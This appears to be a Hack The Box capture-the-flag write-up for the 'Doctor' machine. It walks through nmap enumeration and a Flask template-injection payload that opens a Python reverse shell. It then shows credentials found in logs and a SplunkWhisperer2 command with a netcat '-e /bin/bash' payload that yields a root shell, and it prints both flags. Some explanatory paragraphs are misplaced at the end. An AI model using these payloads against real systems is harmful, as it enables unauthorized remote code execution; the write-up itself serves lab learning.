HTB WriteUps
  • â„šī¸Main Page
  • 👨‍đŸ’ģwhoami
  • Linux Machines
    • Lame
    • Shocker
    • Beep
    • Jarvis
    • Europa
    • Knife
    • Irked
    • Postman
    • Mango
    • Cap
    • Writer
    • Bashed
    • Nibbles
    • Valentine
    • SwagShop
    • Tabby
    • SolidState
    • Doctor
    • OpenAdmin
    • Haircut
    • Blocky
    • Time
    • Passage
    • Mirai
    • Popcorn
    • Magic
    • Delivery
    • Blunder
    • BountyHounter
    • Cronos
    • TartarSauce
    • Ophiuchi
    • Seal
    • Ready
    • Admirer
    • Traverxec
    • Nineveh
    • FriendZone
    • Frolic
    • SneakyMailer
    • Brainfuck
    • Jewel
    • Node
    • Networked
    • Joker
    • RedCross
    • Static
    • Zetta
    • Kotarak
    • Falafel
    • DevOops
    • Hawk
    • Lightweight
    • LaCasaDePapel
    • Jail
    • Safe
    • Bitlab
    • October
    • Book
    • Quick
    • Sink
    • Pit
    • Monitors
    • Unobtainium
    • Inception
    • Compromised
    • CrimeStoppers
    • OneTwoSeven
    • Oz
    • Ellingson
    • Holiday
    • FluJab
    • Spider
    • CTF
  • Windows Machines
    • Jerry
    • Love
    • Arctic
    • Forest
    • Fuse
    • Bastard
    • Silo
    • Devel
    • Remote
    • ServMon
    • Blue
    • Grandpa
    • Legacy
    • SecNotes
    • Omni
    • Active
    • Granny
    • Optimum
    • Worker
    • Bastion
    • Bounty
    • Buff
    • Breadcrums
    • Reel
    • Reel2
    • Conceal
    • Bankrobber
    • Jeeves
    • Bart
    • Tally
    • Netmon
    • Sizzle
    • Sniper
    • Control
    • Nest
    • Sauna
    • Cascade
    • Querier
    • Blackfield
    • APT
    • Atom
  • OTHER OS MACHINES
    • Sense
    • Luanne
    • Poison
    • Schooled
Powered by GitBook
On this page
  • Enumeration
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. Linux Machines

Doctor

Last updated 2 years ago

Was this helpful?

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.209 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Thu Mar 24 14:28:55 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.209
Nmap scan report for 10.10.10.209
Host is up (0.048s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8089/tcp open  unknown

# Nmap done at Thu Mar 24 14:29:22 2022 -- 1 IP address (1 host up) scanned in 26.62 seconds

As we see, only ports 22 (SSH) and 80 (HTTP) and port 8089 are open.

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80,8089 10.10.10.209 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Thu Mar 24 14:29:55 2022 as: nmap -sCV -p22,80,8089 -oN targeted 10.10.10.209
Nmap scan report for 10.10.10.209
Host is up (0.038s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Doctor
|_http-server-header: Apache/2.4.41 (Ubuntu)
8089/tcp open  ssl/http Splunkd httpd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
|_http-server-header: Splunkd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 24 14:30:37 2022 -- 1 IP address (1 host up) scanned in 42.08 seconds

If we enumerate the website with the whatweb tool, we'll see that there is an email with a domain name.

whatweb http://10.10.10.209

http://10.10.10.209/ [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[info@doctors.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.209], JQuery[3.3.1], Script, Title[Doctor]

Let's add the doctors.htb domain name to the /etc/hosts file, and see if there is Virtual Hosting.

Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.209    doctors.htb

Let's take a look at the website.

Not much going on. But, if we search for the http://doctors.htb, we'll another website, with a login page, which means that virtual hosting is being used.

Let's create a new user from the Register section. I will be using the username alfa8sa, the email alfa8sa@alfa8sa.com and some random password.

And we get in.

Exploitation

The Wappalyzer extension detected that the web is using Flask.

Wappalyzer is a browser extension capable of detecting the technology stack of any website. It reveals the technology stack of any website, such as CMS, ecommerce platform or payment processor, as well as company and contact details.

We could try to do a Server Side Template Injection (STTI) attack.

Server Side Template Injection (STTI) occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

Let's create a new message by clicking on the New Message button, and put a simple payload, which will multiply 5 by 5, on the Title text field, and another simple payload, which will multiply 6 by 6, on the Content text field.

If we click on the Post button, we'll see the post, but the code won't be interpreted.

But if we take a look at the source code, we'll see a comment saying that there is an archive under beta testing on the /archive directory.

If we take a look at it at http://doctors.htb/archive, we won't see anything. But if see the source code, we'll see that our payload, the one we put in the title, got interpreted.

Time to get a shell. First, let's set a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.19\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}

If now we access the /archive page, the code will be interpreted, and we'll get a reverse shell as the www user.

http://doctors.htb/archive

listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.209] 59926
bash: cannot set terminal process group (869): Inappropriate ioctl for device
bash: no job control in this shell
web@doctor:~$ whoami
whoami
web

Privilege Escalation

First of all, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

If we see the groups that the user www belongs to, we'll see that it belongs to the adm group.

Members of the adm group have permissions to read log files located inside /var/log/.

As we can read log file, let's go to the /var/log directory.

cd /var/log

And search for the pass word in every log file that we can read.

grep -r pass 2>/dev/null

We'll see a lot of information, but at some point, we should see a POST request to the http://doctor.htb/reset_password URL, with the Guitar123 password.

apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"

Let's see which users are in the system.

cat /etc/passwd | grep sh

root:x:0:0:root:/root:/bin/bash
web:x:1001:1001:,,,:/home/web:/bin/bash
sshd:x:128:65534::/run/sshd:/usr/sbin/nologin
shaun:x:1002:1002:shaun,,,:/home/shaun:/bin/bash
splunk:x:1003:1003:Splunk Server:/opt/splunkforwarder:/bin/bash

If we become the shaun user with the password we found before, then we could grab the user flag.

su shaun

Password: Guitar123                                                                                                                               
shaun@doctor:/var/log$ whoami
shaun                                                                                                                                                
shaun@doctor:/var/log$ cat /home/shaun/user.txt                                                                                                      
5c12fc5171e911c45c1e4b0f0438bfcf 

git clone https://github.com/cnotin/SplunkWhisperer2

Cloning into 'SplunkWhisperer2'...
remote: Enumerating objects: 60, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 60 (delta 0), reused 0 (delta 0), pack-reused 54
Receiving objects: 100% (60/60), 22.00 KiB | 1.16 MiB/s, done.
Resolving deltas: 100% (19/19), done.

Now, let's go to the PySplunkWhisperer2 directory.

cd SplunkWhisperer2/PySplunkWhisperer2/

Before executing the script, let's set another netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

If we now execute the following command, we should get a reverse shell as the root user, and then all we have to do is reap the harvest and take the root flag.

python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.19 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/bash 10.10.14.19 4444"

  • --host remote host.

  • --lhost local host.

  • --username valid username.

  • --password valid password for that username.

  • --payload command which will be executed.

listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.209] 59930
whoami
root
cat /root/root.txt
4288a62ce073023f6821825426578e10

Now, let's make a new message, and put the following payload on the title of the message. The payload is from the GitHub repository.

If we take a look at the nmap report, we'll see that port 8089 is open, and it is a Splunk httpd server. I searched for exploits of that service, and I found this , which allow us to execute commands remotely (RCE). Let's clone it to our current directory.

https://www.wappalyzer.com/
PayloadsAllTheThings
GitHub repository